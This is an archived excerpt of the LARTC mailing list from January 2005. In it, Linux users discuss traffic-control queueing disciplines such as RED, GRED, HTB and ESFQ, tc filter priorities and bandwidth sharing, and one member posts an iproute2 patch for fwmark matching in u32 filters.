http://citeseer.ist.psu.edu/551253.html GREEN (a pro-active variant on the theme of RED) http://citeseer.ist.psu.edu/feng02green.html SMART (Scalable Multipath Aggregated RouTing) http://citeseer.ist.psu.edu/vutukury00smart.html CSFQ (Core Stateless Fair Queueing) http://citeseer.ist.psu.edu/391.html StFQ (Start-Time Fair Queueing) http://citeseer.ist.psu.edu/goyal96starttime.html RFQ (Rainbow Fair Queueing) http://citeseer.ist.psu.edu/cao00rainbow.html PrFQ (Probabalistic Fair Queueing) http://citeseer.ist.psu.edu/anker00prfq.html ERR (Elastic Round Robin) http://citeseer.ist.psu.edu/kanhere02fair.html GFQ (Greedy Fair Queueing) http://citeseer.ist.psu.edu/690207.html PERR (Prioritized Elastic Round Robin) http://citeseer.ist.psu.edu/681127.html AOQ (Anchored Opportunity Queueing) http://citeseer.ist.psu.edu/701742.html BSFQ (Bin Sort Fair Queueing) http://citeseer.ist.psu.edu/622188.html As for the final question on what happens between enqueue and dequeue, there are various diagrams out there which show different aspects of how packets traverse the system. I've included a few links to those I could find: http://open-source.arkoon.net/kernel/kernel_net.png http://ebtables.sourceforge.net/br_fw_ia/PacketFlow.png http://ebtables.sourceforge.net/br_fw_ia/br_fw_ia.html http://www.docum.org/docum.org/kptd/ The last of these is the infamous Kernel Packet Travelling Diagram. Most links to this that I've been able to find are broken. It should be noted that the diagrams all refer to the Linux 2.4 kernel. Linux 2.6 has quite a few QoS changes to it, but I'm unclear as to whether they significantly alter any of the flows. I hope this is of some use. Or, at the very least, is an effective remedy to insomnia. :) Jonathan --- Zhenyu Wu wrote: > Hello, > > Normally, in addition to such qdisc scheduler > mechanisms as FIFO, PQ, WRR, WFQ, > are there any more? Then, there is a confusion on > scheduler in Linux enviroment: > Assume there is a qdisc, such as RED as a leaf qdisc > in a router, we know, if > there is packet which want to enqueue the packet, > the Function red_enqueue is > called, but when the packet leave the queue(when the > Function red_dequeue is > called)? I think it is meaningless when the pack > leaves the queue just it enterred > it. Is there anything need to be done betweent the > packet's enqueue and dequeue? > > Best, > > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: > http://lartc.org/ > __________________________________ Do you Yahoo!? Jazz up your holiday email with celebrity designs. Learn more. http://celebrity.mail.yahoo.com From ngohoanggiang1981dh@yahoo.com Tue Jan 4 07:29:56 2005 From: ngohoanggiang1981dh@yahoo.com (ngo giang) Date: Mon, 3 Jan 2005 23:29:56 -0800 (PST) Subject: [LARTC] How to manage relatively internet bandwidth while don't know specific input internet bandwidth ? Message-ID: <20050104072957.45355.qmail@web51610.mail.yahoo.com> --0-413819850-1104823796=:43020 Content-Type: text/plain; charset=us-ascii Hello, My organization has a LAN network and the LAN is connected to internet by a Cisco router. internet -------| Cisco router |------ LAN (The cisco router can not be replaced by a linux router, I think, because the LAN has more than 1000 computers.) LAN network is divided into some sub networks. I have to relatively manage internet bandwidth (between applications and between computers ) at these sub-networks using linux router . internet | ------------> bandwidth here is known. cisco router / | \ .... ............................ / | \ ----------------> I don't know internet bandwidth of each sub network linux linux ...... router router / | sub sub ..... network network ..... My problem is I don't know the internet bandwidth of each sub network. Can you give me some suggestion about schemes I can use in a linux router (what qdisc, ... ). Thank in advance, nhgiang --------------------------------- Do you Yahoo!? Yahoo! Mail - Helps protect you from nasty viruses. --0-413819850-1104823796=:43020 Content-Type: text/html; charset=us-ascii
Hello,
 
My organization has a LAN network and the LAN is connected to internet by a Cisco router.
 
internet -------| Cisco router |------ LAN
 
(The cisco router can not be replaced by a linux router, I think, because the LAN has more
 
than 1000 computers.)
 
LAN network is divided into some sub networks. I have to relatively manage internet
 
bandwidth (between applications and between computers ) at these sub-networks using linux
 
router .
 
               internet
                  |            ------------> bandwidth here is known.
            cisco router
             /      |      \  ....
         ............................
           /        |        \  ----------------> I don't know internet bandwidth of each sub network
         linux   linux    ......
        router  router   
         /         |        
       sub      sub         .....
   network    network   .....
 
My problem is  I don't know the internet bandwidth of each sub network.
 
Can you give me some suggestion about schemes I can use in  a linux router  (what qdisc, ... ).
 
Thank in advance,
 
nhgiang  

Do you Yahoo!?
Yahoo! Mail - Helps protect you from nasty viruses. --0-413819850-1104823796=:43020-- From andy.furniss@dsl.pipex.com Tue Jan 4 13:57:25 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 04 Jan 2005 13:57:25 +0000 Subject: [LARTC] Weighted packet shaping? In-Reply-To: <20050103112214.GA10708@circolab.net> References: <41C97B57.80207@dsl.pipex.com> <20041222153607.GC11969@linux.comp> <41C9FB14.6000805@dsl.pipex.com> <20041223105418.GA19364@linux.comp> <41CC22F1.70907@dsl.pipex.com> <20041224150730.GA18760@linux.comp> <41CC457A.5040405@dsl.pipex.com> <20041226042648.GA24904@linux.comp> <41CEB816.5030902@dsl.pipex.com> <20041228092343.GA8003@linux.comp> <20050103112214.GA10708@circolab.net> Message-ID: <41DAA0C5.5000701@dsl.pipex.com> marco ghidinelli wrote: > > ok, maybe i'm wrong, but i try to run the same script, and i think that > the script have problem setting prio 0 on filters: > > running: > > $TC filter add dev $IFNAME parent 1:0 prio 0 protocol ip handle 22 fw > flowid 1:20 > $TC filter add dev $IFNAME parent 1:0 prio 2 protocol ip handle 21 fw > flowid 1:21 > > gave me: > > # tc filter list dev eth0 > filter parent 1: protocol ip pref 2 fw > filter parent 1: protocol ip pref 2 fw handle 0x15 classid 1:21 > filter parent 1: protocol ip pref 49152 fw > filter parent 1: protocol ip pref 49152 fw handle 0x16 classid 1:20 > > ----------------------------------^^^^^ > > don't blame me if this is obvious/wrong/stupid. :) Well spotted - you are right, I see the same, so it looks like 0 is not the highest prio when used on filters - I shall use 1 in future. As for affecting this test - I don't think it will make any difference in this case because it just affects the order that the matches get tested against the packets. With only 3 tests and low packets/sec it should makes no difference. It's still usefull to know for other setups, though - thanks. Andy. > > 2.6.10, with lastest iproute2 > From justin@expertron.co.za Tue Jan 4 15:09:40 2005 From: justin@expertron.co.za (Justin Schoeman) Date: Tue, 04 Jan 2005 17:09:40 +0200 Subject: [LARTC] ESFQ? Message-ID: <41DAB1B4.6030902@expertron.co.za> Hi again, I was just looking around for ESFQ sources, and I see that the main site is down, and only has kernel 2.6.4 patches. Is ESFQ maintained? If so, where can I find patches for 2.6.10? Thanks, -justin From alg0@iit.demokritos.gr Tue Jan 4 17:49:46 2005 From: alg0@iit.demokritos.gr (Antonios Chalkiopoulos) Date: Tue, 4 Jan 2005 19:49:46 +0200 Subject: [LARTC] HTB + GRED (santa clauss plz help me out) In-Reply-To: <41D57F49.2050201@dsl.pipex.com> References: <20041230061315.5399.60774.Mailman@outpost.ds9a.nl> <200412301907.21005.alg0@iit.demokritos.gr> <41D57F49.2050201@dsl.pipex.com> Message-ID: <200501041949.46730.alg0@iit.demokritos.gr> Dear Andy, > > I 've been trynig for a long time now to make HTB and GRED to work > > together. The problem beeing that GRED doesn't use handles (instead it > > uses DP:1 DP:2 etc) i can not preperly filter traffic to them. > > > > Tomas Graf suggested to use the tc_index index of u32 classifier > > > > so dear Sant .. i am currently with the following scripts that works! > > Have you seen this > > http://www.opalsoft.net/qos/DS-27.htm > > Though if it works you don't need it :-) I am aware of it and have spend a few hours trying to make it work... without any success. > > > But when i try to add an HTB before the GRED, everything goes to hell. > > You may need to repeat filters to get HTB to go from root to GRED (well > you do with PRIO) eg. from a usenet post. That IS EXCACTLY MY PROBLEM. In the case of ordinary qdiscs i repeat my filters to the new handles (3:1 3:2 etc). In the case of GRED there are no handles to play with and i am unuable to filter traffic into GRED... Antonios From imipak@yahoo.com Tue Jan 4 18:04:42 2005 From: imipak@yahoo.com (Jonathan Day) Date: Tue, 4 Jan 2005 10:04:42 -0800 (PST) Subject: [LARTC] ESFQ? In-Reply-To: <41DAB1B4.6030902@expertron.co.za> Message-ID: <20050104180442.47689.qmail@web12304.mail.yahoo.com> To the best of my knowledge, ESFQ for Linux is essentially dead. There's a patchset - QNet - which does port ESFQ to the 2.6.8/2.6.9 kernels, but ESFQ is not split out, so it looks like an all-or-nothing deal. http://kem.p.lodz.pl/~peter/qnet/ I don't know if QNet is still being maintained - the last update on the page refers to October 2004 - and there's nothing to indicate how well the forward ports actually work in practice. A search using Google shows only older ESFQ versions (one for 2.6.0-test11, for example) but nothing newer. There was one posting about ESFQ to the kernel developers mailing list, but I couldn't see any follow-ups to it. Nor does it appear to be in Andrew Morton's patchset (an excellent indicator of interest level and the probability of ending up in the official kernel). Unfortunately, this seems to be fairly common in Linux QoS - too many one-man projects and too few resources too keep them going. --- Justin Schoeman wrote: > Hi again, > > I was just looking around for ESFQ sources, and I > see that the main site > is down, and only has kernel 2.6.4 patches. > > Is ESFQ maintained? If so, where can I find patches > for 2.6.10? > > Thanks, > -justin > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: > http://lartc.org/ > __________________________________ Do you Yahoo!? Yahoo! Mail - You care about security. So do we. http://promotions.yahoo.com/new_mail From Zhenyu Wu" Thank you very much, i will try to find these papers which must be very helpful for me. The "more" means that whether there are other mechanisms not only for Linux. Sorry, i have not make it clear! Sometimes, i wonder whether the qdiscs such as CBQ, RED, GRED ... are belong to the scheduler mechanisms in linux enviroment. For example, In Red, which i can find are enqueue, and dequeue.... so, if i add a RED qidsc to a class, must i add a scheduler mechanism so that i can decide which packet in the queues will be scheduled and put to the link? Good luck, Best, >It depends on what you mean by "more". More for Linux? > Certainly. HTB3 seems to be a popular mechanism, and > you can use IMQ to set up an intermediate device to > allow shaping of both inbound and outbound traffic, > using one (or more!) scheduling mechanisms in series. > > (In fact, there are several versions of IMQ out there. > I've given links to both the projects that seem to be > alive, but there may be more.) > > There's also ESFQ, but there doesn't seem to be much > active work on that. There are forward ports to recent > Linux kernels, though. QLinux has a version of H-SFQ > for Linux, but again it seems to be getting long in > the tooth. Unfortunately, I can't find any forward > ports of that. > > http://luxik.cdi.cz/~devik/qos/htb/ > http://www.linuximq.net/ > http://pupa.da.ru/imq/ > > http://www.digriz.org.uk/jdg-qos-script/#qos-2.6 > http://kem.p.lodz.pl/~peter/qnet/ > http://lass.cs.umass.edu/software/qlinux/ > > There are a great many systems that I can't find a > Linux version of. Cisco routers support something > called "Class-Based Weighted Fair Queueing" (CBWFQ) > which seems to be a hybrid of classful and classless > scheduling. Cisco also has two versions of ECN, for > forwards and backwards propogation. > > I've listed below a number of papers detailing various > QoS schemes. Some of these have been implemented in > other OS' (the BSDs tend to get a lot of this stuff > implemented quickly for them as part of ALTQ) and some > I've never seen an implementation at all. However, the > papers should all give enough information to write a > version for Linux. > > Note: ALTQ can be found at: > http://www.csl.sony.co.jp/person/kjc/kjc/software.html > > Please note that this list is not exhaustive. Rather, > I got exhausted after trying to find what was out > there and what state it was currently in. QoS is a big > field, if the number of papers is anything to go by. > Linux only touches the fringes of it. If anyone feels > particularly bored, or in need of a good ego boost, it > would be cool to see if a reasonable selection of > these could be introduced into Linux over the 2.7 > cycle. > > EDF (Earliest Deadline First) > http://citeseer.ist.psu.edu/13919.html > > BLUE (an alternative to RED) > http://citeseer.ist.psu.edu/feng99blue.html > > AF PHB (Assured Forwarding Per-Hop Behaviour) > http://citeseer.ist.psu.edu/552302.html > > SFB (Stochastic Fair Blue) > http://citeseer.ist.psu.edu/551253.html > > GREEN (a pro-active variant on the theme of RED) > http://citeseer.ist.psu.edu/feng02green.html > > SMART (Scalable Multipath Aggregated RouTing) > http://citeseer.ist.psu.edu/vutukury00smart.html > > CSFQ (Core Stateless Fair Queueing) > http://citeseer.ist.psu.edu/391.html > > StFQ (Start-Time Fair Queueing) > http://citeseer.ist.psu.edu/goyal96starttime.html > > RFQ (Rainbow Fair Queueing) > http://citeseer.ist.psu.edu/cao00rainbow.html > > PrFQ (Probabalistic Fair Queueing) > http://citeseer.ist.psu.edu/anker00prfq.html > > ERR (Elastic Round Robin) > http://citeseer.ist.psu.edu/kanhere02fair.html > > GFQ (Greedy Fair Queueing) > http://citeseer.ist.psu.edu/690207.html > > PERR (Prioritized Elastic Round Robin) > http://citeseer.ist.psu.edu/681127.html > > AOQ (Anchored Opportunity Queueing) > http://citeseer.ist.psu.edu/701742.html > > BSFQ (Bin Sort Fair Queueing) > http://citeseer.ist.psu.edu/622188.html > > > As for the final question on what happens between > enqueue and dequeue, there are various diagrams out > there which show different aspects of how packets > traverse the system. I've included a few links to > those I could find: > > http://open-source.arkoon.net/kernel/kernel_net.png > http://ebtables.sourceforge.net/br_fw_ia/PacketFlow.png > http://ebtables.sourceforge.net/br_fw_ia/br_fw_ia.html > http://www.docum.org/docum.org/kptd/ > > The last of these is the infamous Kernel Packet > Travelling Diagram. Most links to this that I've been > able to find are broken. It should be noted that the > diagrams all refer to the Linux 2.4 kernel. Linux 2.6 > has quite a few QoS changes to it, but I'm unclear as > to whether they significantly alter any of the flows. > > I hope this is of some use. Or, at the very least, is > an effective remedy to insomnia. :) > > Jonathan > > --- Zhenyu Wu wrote: > > > Hello, > > > > Normally, in addition to such qdisc scheduler > > mechanisms as FIFO, PQ, WRR, WFQ, > > are there any more? Then, there is a confusion on > > scheduler in Linux enviroment: > > Assume there is a qdisc, such as RED as a leaf qdisc > > in a router, we know, if > > there is packet which want to enqueue the packet, > > the Function red_enqueue is > > called, but when the packet leave the queue(when the > > Function red_dequeue is > > called)? I think it is meaningless when the pack > > leaves the queue just it enterred > > it. Is there anything need to be done betweent the > > packet's enqueue and dequeue? > > > > Best, > > > > > > _______________________________________________ > > LARTC mailing list / LARTC@mailman.ds9a.nl > > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: > > http://lartc.org/ > > > > > > > __________________________________ > Do you Yahoo!? > Jazz up your holiday email with celebrity designs. Learn more. > http://celebrity.mail.yahoo.com > > From imipak@yahoo.com Wed Jan 5 03:59:46 2005 From: imipak@yahoo.com (Jonathan Day) Date: Tue, 4 Jan 2005 19:59:46 -0800 (PST) Subject: [LARTC] Scheduler Mechnisms! In-Reply-To: <304889647.25037@njupt.edu.cn> Message-ID: <20050105035946.38738.qmail@web12303.mail.yahoo.com> I may be wrong on this, but I believe that RED can be attached to any queueing system, including the basic FIFO queues. In a sense, you're still using a scheduling system, when using the default arrangement, it's just a first-come, first-served one. RED is classless and applies to the whole of a queue. What that queue is attached to, if I understand it correctly, isn't important. It can be a class, but it can just as easily be everything going through that device. Again, someone correct me if I'm wrong, but as I understand it, there are four levels to the whole QoS/diffserv concept. One of these levels is the queueing discipline. This can be something like CBQ, WFQ, FIFO, PRIO, or whatever. This is how the data is organized, it does not describe how the data is sent. In the case of something like CBQ, you have a defined set of queues in parallel, with rules as to what packets fall into what queue. On the other hand, queueing schemes such as FIFO are flat. There's a single queue that everything goes through, though there may be different rules for how things get pushed to it. Another level is the scheduling mechanism. This describes how the data is sent, once organized, but does not describe the organization itself. If you've only one queue, then there's really not much to schedule. If you've multiple queues, then it's fairly normal to use "round robin" or "weighted round robin" to pick which queue to pull a packet from. Linux' CBQ uses "weighted round robin", according to the C file. The next level is the packet dropping mechanism. When queues flood, packets are going to be dropped. There's nowhere to store them. I'm pretty sure the default behaviour is to simply continue accepting packets, but to drop any that expire before being sent or which fall off the end of the queue (if the queue is bounded). RED, GRED, and a whole host of similar mechanisms, try to drop packets in a more controlled manner. However, that is really all they do. Finally, there are mechanisms for damping overly active applications, such as ECN. The idea here is that if you throttle back whatever is generating excess traffic, you don't get the problems assoicated with dealing with it. The "default" behaviour is to do nothing. When setting up QoS - on Linux or anything else - you basically pick one of each of the four categories to assemble a packet delivery system. Even without QoS, you're doing that, you're just using the defaults in all cases. The mechanisms are still going to be there. The Linux configuration menu does NOT match the above terminology, or the terminology in the source code. Thus, the source code identifies CBQ as a queueing discipline, but the configuration menu calls it a scheduler. The QoS help is also not very helpful, as it mostly tells people to look at the source. However, if you look at the source for CBQ or RED, for example, the explanation is relative to the cited papers, so you then have to go and read those before coming back and doing anything. This is one area I hope is going to get resolved in the reasonably near future. If not, I might have to come up with a patch myself. The very thought of that should send shivers down the spines of any kernel developers out there. Jonathan --- Zhenyu Wu wrote: > Thank you very much, i will try to find these papers > which must be very helpful > for me. The "more" means that whether there are > other mechanisms not only for > Linux. Sorry, i have not make it clear! Sometimes, i > wonder whether the qdiscs > such as CBQ, RED, GRED ... are belong to the > scheduler mechanisms in linux > enviroment. For example, In Red, which i can find > are enqueue, and dequeue.... so, > if i add a RED qidsc to a class, must i add a > scheduler mechanism so that i can > decide which packet in the queues will be scheduled > and put to the link? > > Good luck, > Best, __________________________________ Do you Yahoo!? The all-new My Yahoo! - What will yours do? http://my.yahoo.com From imipak@yahoo.com Wed Jan 5 04:24:00 2005 From: imipak@yahoo.com (Jonathan Day) Date: Tue, 4 Jan 2005 20:24:00 -0800 (PST) Subject: [LARTC] Suggestion - table of QoS mechanisms Message-ID: <20050105042400.61837.qmail@web12308.mail.yahoo.com> Hi, A thought for the list. As I mentioned in another posting, there are a lot of QoS mechanisms out there. Linux supports some, but not all. Some patchsets add others, but don't work for all kernels. There are also userland implementations, usually sitting in software routers, but there are other packages. Would it be helpful if I worked on a table of what's out there for Linux and in what form? The main drawback of such a list is that while I can tell you if such-and-such an implementation exists, that doesn't mean the implementation is any good, or that the QoS concept is valid. There are plenty of arguments amongst QoS researchers as to whether RED is useful or not, and those are the people most qualified to know the answer. Nor would I be able to verify what kernel patches work well together, so the individual existance of specific mechanisms doesn't mean you can combine them usefully. On the other hand, there doesn't seem to be any easy way for people to find out what does exist, what doesn't exist YET for Linux but could easily be written, or what used to exist but has been dropped for reasons known or unknown. For example, SGI's "Scheduled Transfer Protocol", MPLS, WRR and ESFQ are all examples of networking algorithms that are apparently deceased. The Layer 7 packet classifier isn't dead, but doesn't apply cleanly to kernels 2.6.9 or later. Finding these can be fun, too. I've got a copy of the Scheduled Transfer Protocol patches, but that's because I downloaded them while they were still on SGI's FTP site. If they exist anywhere on the Internet today, I haven't the foggiest where. The site for ESFQ is dead, and the only known patches forward-ported to recent kernels is merged into the qnet patch series, making it hard to extract. Any thoughts on this? Jonathan __________________________________ Do you Yahoo!? Read only the mail you want - Yahoo! Mail SpamGuard. http://promotions.yahoo.com/new_mail From jasonb@edseek.com Wed Jan 5 04:35:13 2005 From: jasonb@edseek.com (Jason Boxman) Date: Tue, 4 Jan 2005 23:35:13 -0500 Subject: [LARTC] Suggestion - table of QoS mechanisms In-Reply-To: <20050105042400.61837.qmail@web12308.mail.yahoo.com> References: <20050105042400.61837.qmail@web12308.mail.yahoo.com> Message-ID: <200501042335.13925.jasonb@edseek.com> On Tuesday 04 January 2005 23:24, Jonathan Day wrote: > Hi, > > A thought for the list. As I mentioned in another > posting, there are a lot of QoS mechanisms out there. > Linux supports some, but not all. Some patchsets add > others, but don't work for all kernels. There are also > userland implementations, usually sitting in software > routers, but there are other packages. > > Would it be helpful if I worked on a table of what's > out there for Linux and in what form? Possibly. I only know of CBQ, HTB, HFSC, SFQ, TBF, PFIFO, PRIO, G/RED for Linux offhand. > The main drawback of such a list is that while I can > tell you if such-and-such an implementation exists, > that doesn't mean the implementation is any good, or > that the QoS concept is valid. There are plenty of > arguments amongst QoS researchers as to whether RED is > useful or not, and those are the people most qualified > to know the answer. Nor would I be able to verify what > kernel patches work well together, so the individual > existance of specific mechanisms doesn't mean you can > combine them usefully. Yeah, QoS isn't exactly a plug and play experience. > On the other hand, there doesn't seem to be any easy > way for people to find out what does exist, what > doesn't exist YET for Linux but could easily be > written, or what used to exist but has been dropped > for reasons known or unknown. I wrote a guide, Practical Guide to Linux Traffic Control[1], which I keep up to date as developments change. I only cover stuff in the mainline kernel for the most part, though. [1] http://trekweb.com/~jasonb/articles/traffic_shaping/ > For example, SGI's "Scheduled Transfer Protocol", > MPLS, WRR and ESFQ are all examples of networking > algorithms that are apparently deceased. The Layer 7 > packet classifier isn't dead, but doesn't apply > cleanly to kernels 2.6.9 or later. Layer 7 does patch against 2.6.9 with an experimental patch available since the beginning of December on the project's SF page. It Works For Me (tm) but I guess it hasn't been tested sufficiently such that it's now available as a stable 2.6.9+ patch. > Finding these can be fun, too. I've got a copy of the > Scheduled Transfer Protocol patches, but that's > because I downloaded them while they were still on > SGI's FTP site. If they exist anywhere on the Internet > today, I haven't the foggiest where. The site for ESFQ > is dead, and the only known patches forward-ported to > recent kernels is merged into the qnet patch series, > making it hard to extract. That's too bad. I had wanted to include something about ESFQ but never got around to it, since SFQ generally suits my needs. -- Jason Boxman Perl Programmer / *NIX Systems Administrator Shimberg Center for Affordable Housing | University of Florida http://edseek.com/ - Linux and FOSS stuff From imipak@yahoo.com Wed Jan 5 06:03:59 2005 From: imipak@yahoo.com (Jonathan Day) Date: Tue, 4 Jan 2005 22:03:59 -0800 (PST) Subject: [LARTC] Suggestion - table of QoS mechanisms In-Reply-To: <200501042335.13925.jasonb@edseek.com> Message-ID: <20050105060359.58719.qmail@web12303.mail.yahoo.com> The URL for the guide was useful, thanks. Here are a few other QoS systems for Linux: RSVP is provided in the stock kernel. This allows you to reserve a given amount of bandwidth for a specific UDP data stream. It is typically not used in "the real world" because it doesn't scale well. Too much state information needs to be transmitted and kept track of, to be useful on backbone routers. USAGI is based on KAME, and KAME supports ALTQ. In turn, ALTQ supports HFSC, JoBS, RIO and BLUE for both IPv4 and IPv6. It is NOT clear from the USAGI web page as to whether ALTQ is included in their code. http://www.linux-ipv6.org/ http://www.csl.sony.co.jp/person/kjc/kjc/software.html QLinux supports H-SFQ, but is based on Linux 2.2 and the 2.4 sources don't seem to have ever been released. http://lass.cs.umass.edu/software/qlinux/ DGT2684 (seems to be dead, unless the pseudo-QoS for ATM in the Linux kernel is based on this, but then the code on Sourceforge should be current, you'd have thought) http://sourceforge.net/projects/dgt2684 I'm not altogether sure what SIMA did, but it seems to have been a queueing system of sorts for the 2.2 kernels. http://www.atm.tut.fi/faster/sima/ It's a cheat, but you can route traffic onto and off Network Simulator and therefore use any QoS devices available for that for regular networking. This includes Fair Queueing, Stochastic Fair Queueing and Deficit Round Robin, by default. Many of the ALTQ routines have NS implementations, as well, and I'm sure there are others. NS seems to be popular with protocol researchers. http://www.isi.edu/nsnam/ns/ There's also a QoS Library which provides a useful API for applications. http://www.coverfire.com/lql/ Finally, I also mentioned SGI's STP patch. STP allows you to reserve network resources for a future data stream. As far as I can tell, it is very similar in concept to RSVP, except that it is not UDP-specific and is specifically designed for very high-speed networks, where constructing and destructing connections at the time of use can add excessive latency. By pre-allocating, the connection can all be set up and ready to use when it is actually needed. --- Jason Boxman wrote: (snip) > Possibly. > > I only know of CBQ, HTB, HFSC, SFQ, TBF, PFIFO, > PRIO, G/RED for Linux offhand. (snip) __________________________________ Do you Yahoo!? Take Yahoo! Mail with you! Get it on your mobile phone. http://mobile.yahoo.com/maildemo From fed Wed Jan 5 07:02:12 2005 From: fed (fed) Date: Wed, 5 Jan 2005 08:02:12 +0100 Subject: [LARTC] Connections direct to the gateway Message-ID: Hi, I use the fairnat scripts on a linux gateway, on this gateway runs a transparent web proxy, a local web server and some other few applications for the clients in the lan. Using this scripts limits the bandwidth of the connection to the gateway too so for example the proxy become unuseful. It is possibile with some rules or another way to get the full bandwidth and not limit it for the connection from the clients in the lan direct to the gateway ? Bye Thanks for the help. From justin@expertron.co.za Wed Jan 5 07:18:55 2005 From: justin@expertron.co.za (Justin Schoeman) Date: Wed, 05 Jan 2005 09:18:55 +0200 Subject: [LARTC] ESFQ? In-Reply-To: <20050104180442.47689.qmail@web12304.mail.yahoo.com> References: <20050104180442.47689.qmail@web12304.mail.yahoo.com> Message-ID: <41DB94DF.2070407@expertron.co.za> Ouch... Is there any other way to do host-based fair sharing (well, other than actually classifying each host :-( )? Thanks, -justin Jonathan Day wrote: > To the best of my knowledge, ESFQ for Linux is > essentially dead. There's a patchset - QNet - which > does port ESFQ to the 2.6.8/2.6.9 kernels, but ESFQ is > not split out, so it looks like an all-or-nothing > deal. > > http://kem.p.lodz.pl/~peter/qnet/ > > I don't know if QNet is still being maintained - the > last update on the page refers to October 2004 - and > there's nothing to indicate how well the forward ports > actually work in practice. > > A search using Google shows only older ESFQ versions > (one for 2.6.0-test11, for example) but nothing newer. > > There was one posting about ESFQ to the kernel > developers mailing list, but I couldn't see any > follow-ups to it. Nor does it appear to be in Andrew > Morton's patchset (an excellent indicator of interest > level and the probability of ending up in the official > kernel). > > Unfortunately, this seems to be fairly common in Linux > QoS - too many one-man projects and too few resources > too keep them going. > > --- Justin Schoeman wrote: > > >>Hi again, >> >>I was just looking around for ESFQ sources, and I >>see that the main site >>is down, and only has kernel 2.6.4 patches. >> >>Is ESFQ maintained? If so, where can I find patches >>for 2.6.10? >> >>Thanks, >>-justin >>_______________________________________________ >>LARTC mailing list / LARTC@mailman.ds9a.nl >>http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: >>http://lartc.org/ >> > > > > > > > __________________________________ > Do you Yahoo!? > Yahoo! Mail - You care about security. So do we. > http://promotions.yahoo.com/new_mail From andy.furniss@dsl.pipex.com Wed Jan 5 08:20:09 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Wed, 05 Jan 2005 08:20:09 +0000 Subject: [LARTC] ESFQ? In-Reply-To: <41DB94DF.2070407@expertron.co.za> References: <20050104180442.47689.qmail@web12304.mail.yahoo.com> <41DB94DF.2070407@expertron.co.za> Message-ID: <41DBA339.3060407@dsl.pipex.com> Justin Schoeman wrote: > Ouch... Is there any other way to do host-based fair sharing (well, > other than actually classifying each host :-( )? I don't think it will take much to get it to work - though I haven't tried :-) . I'll have a look at doing a 2.6.10 in the next few days. Andy. From justin@expertron.co.za Wed Jan 5 08:46:10 2005 From: justin@expertron.co.za (Justin Schoeman) Date: Wed, 05 Jan 2005 10:46:10 +0200 Subject: [LARTC] ESFQ? In-Reply-To: <41DBA339.3060407@dsl.pipex.com> References: <20050104180442.47689.qmail@web12304.mail.yahoo.com> <41DB94DF.2070407@expertron.co.za> <41DBA339.3060407@dsl.pipex.com> Message-ID: <41DBA952.5010203@expertron.co.za> Woohoo - that would be great! -justin Andy Furniss wrote: > Justin Schoeman wrote: > >> Ouch... Is there any other way to do host-based fair sharing (well, >> other than actually classifying each host :-( )? > > > I don't think it will take much to get it to work - though I haven't > tried :-) . > > I'll have a look at doing a 2.6.10 in the next few days. > > Andy. > > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ From ngohoanggiang1981dh@yahoo.com Wed Jan 5 09:09:41 2005 From: ngohoanggiang1981dh@yahoo.com (ngo giang) Date: Wed, 5 Jan 2005 01:09:41 -0800 (PST) Subject: [LARTC] Sharing/splitting bandwidth on a link while bandwidth of the link is variable (or unknown) ? Message-ID: <20050105090941.73415.qmail@web51608.mail.yahoo.com> --0-1263255390-1104916181=:73275 Content-Type: text/plain; charset=us-ascii Hello, I want to share/split bandwidth on a link with unknown bandwidth. I want to exactly share/split bandwidth (for example : FTP 30% , HTTP 20% or 30% for a group of PCs and so forth.) "Traffic-Control-HOWTO" talk that PRIO scheduler is an ideal match for "Handling a link with a variable (or unknown) bandwidth". But PRIO scheduler can not exactly share/split bandwidth . Could you tell me if I can exactly share/split bandwidth on a link with a variable (or unknown) bandwidth? If it is possible, how can I do that ? Thanks in advance! nhgiang. __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com --0-1263255390-1104916181=:73275 Content-Type: text/html; charset=us-ascii
Hello,
 
I want to  share/split bandwidth on a link with unknown bandwidth. I want to exactly
share/split bandwidth (for example : FTP 30% , HTTP 20% or 30% for a group of PCs and so forth.)
 
"Traffic-Control-HOWTO" talk that PRIO scheduler is an ideal match for "Handling a link with a variable (or unknown) bandwidth".
 
But PRIO scheduler can not exactly share/split bandwidth .
 
Could you tell me if  I can exactly share/split bandwidth on a link with a variable (or unknown) bandwidth?  If it is possible, how can I do that ?
 
Thanks in advance!
nhgiang.
 

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com --0-1263255390-1104916181=:73275-- From util@deuroconsult.ro Wed Jan 5 10:05:07 2005 From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE) Date: Wed, 5 Jan 2005 12:05:07 +0200 (EET) Subject: [LARTC] [PATCH] mark in u32 Message-ID: This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. ---1646943047-595155148-1104919507=:9453 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed Hello, Stephen, List! Attached is the patch for iproute2 to add the possibility to use fwmark in u32 filters. The kernel part was included in 2.6.10. Please apply! Thank you! For more info: - Kernel patch (not needed for 2.6.10): http://kernel.umbrella.ro/net/mark_in_u32/net-match-nfmark-in-u32.patch - Examples: http://kernel.umbrella.ro/net/mark_in_u32/examples.txt --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ ---1646943047-595155148-1104919507=:9453 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="iproute2-match-mark-in-u32.patch" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename="iproute2-match-mark-in-u32.patch" LS0tIGlwcm91dGUyLTIuNi45L3RjL2ZfdTMyLmMub3JpZwkyMDA0LTExLTA0 IDE1OjM4OjUzLjAwMDAwMDAwMCArMDIwMA0KKysrIGlwcm91dGUyLTIuNi45 L3RjL2ZfdTMyLmMJMjAwNC0xMS0wOSAxMzo1OTowMC4wMDAwMDAwMDAgKzAy MDANCkBAIC03LDYgKzcsNyBAQA0KICAqCQkyIG9mIHRoZSBMaWNlbnNlLCBv 